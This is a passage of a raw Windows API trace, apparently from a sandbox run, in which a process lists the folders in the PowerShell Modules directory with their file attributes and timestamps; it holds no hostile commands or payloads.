SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0286.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0286.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0286.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0286.169] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f76910 [0286.169] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.170] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0286.170] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0286.170] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0286.170] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0286.171] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0286.171] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0286.171] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0286.171] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0286.172] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0286.172] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0286.172] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0286.172] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0286.172] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0286.173] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0286.173] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0286.173] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0286.173] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0286.173] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0286.174] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0286.174] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0286.174] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0286.174] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0286.175] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0286.175] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0286.175] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0286.175] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0286.176] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0286.176] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0286.176] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0286.176] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0286.176] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0286.177] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0286.177] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0286.177] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0286.177] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0286.178] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0286.178] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0286.178] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0286.179] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0286.179] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0286.179] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0286.179] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0286.179] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, 